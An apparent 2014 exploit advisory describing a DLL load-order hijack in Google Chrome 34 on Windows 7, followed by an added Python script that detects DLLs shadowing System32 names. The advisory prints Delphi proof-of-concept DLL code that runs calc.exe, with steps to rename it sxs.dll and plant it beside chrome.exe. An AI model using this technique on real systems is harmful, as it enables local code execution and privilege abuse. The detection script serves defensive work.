# Google Chrome latest Version 34.0.1847.131 m 32-bit DLL Order Hijacking
#
###########################
#
# Exploit Title: [Google Chrome Version 34.0.1847.131 m 32-bit DLL Order Hijacking]
# Date: [2014/04/25]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.chromium.org/]
# Software Link: [http://www.filehorse.com/download-google-chrome/]
# Version: [Version 34.0.1847.116 32-bit ]
# Tested on: [Windows 7 Ultimate - 32bit]
#
###########################
Details:
An untrusted search path vulnerability in the latest version of Chrome [34.0.1847.131], when running on Windows 7 32-bit, allows local users and possibly remote attackers to gain privileges via a Trojan horse DLL named sxs.dll in the current working directory.
This is a DLL load order hijacking issue that let me execute arbitrary code alongside Google Chrome: the latest version of Chrome suffers from load order hijacking of the "Sxs.dll" library. I attached proof-of-concept code that runs alongside Google Chrome if you put it beside chrome.exe; it works like a charm and executes calc.
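library poc; { hypothetical library name; the compiled DLL is renamed below }

uses
  Windows;

begin
  { Runs when the DLL is loaded: launch Calculator as a visible marker }
  WinExec(PAnsiChar('C:\WINDOWS\system32\calc.exe'), SW_SHOW);
end.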
Compile the above source code with Delphi and rename the compiled DLL to sxs.dll, then copy it to the Chrome install path. Now, when you run Chrome, the DLL will be hijacked!
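
A defender-side check for the condition described above, added here as an example and not part of the original advisory: it flags any DLL sitting beside an executable whose name also exists in the system directory (as sxs.dll does) and reports whether the two copies differ. The function names, directory layout and sample files are constructed assumptions.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256(path):
    """Hash a file so a same-named copy can be compared with the system one."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def find_shadowing_dlls(app_dir, system_dir):
    """Return DLLs in app_dir whose name (case-insensitive) also exists in system_dir."""
    system = {p.name.lower(): p for p in Path(system_dir).iterdir()
              if p.is_file() and p.suffix.lower() == ".dll"}
    findings = []
    for p in sorted(Path(app_dir).iterdir()):
        if not p.is_file() or p.suffix.lower() != ".dll":
            continue
        twin = system.get(p.name.lower())
        if twin is None:
            continue  # application-private DLL, no system namesake
        findings.append({
            "name": p.name.lower(),
            "path": str(p),
            # False means the local copy is not the system binary: investigate.
            "same_content": sha256(p) == sha256(twin),
        })
    return findings


def demo():
    """Constructed layout: an install directory with a planted sxs.dll."""
    with tempfile.TemporaryDirectory() as root:
        app, sysdir = Path(root) / "Application", Path(root) / "System32"
        app.mkdir()
        sysdir.mkdir()
        (sysdir / "sxs.dll").write_bytes(b"constructed system copy")
        (sysdir / "kernel32.dll").write_bytes(b"constructed system copy 2")
        (app / "chrome.exe").write_bytes(b"constructed executable")
        (app / "app_helper.dll").write_bytes(b"constructed private dll")
        (app / "SXS.DLL").write_bytes(b"constructed planted copy")
        return find_shadowing_dlls(app, sysdir)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, point `find_shadowing_dlls` at the application's install directory and `C:\Windows\System32`; a hit with `same_content` set to False warrants a signature and provenance check on the local file.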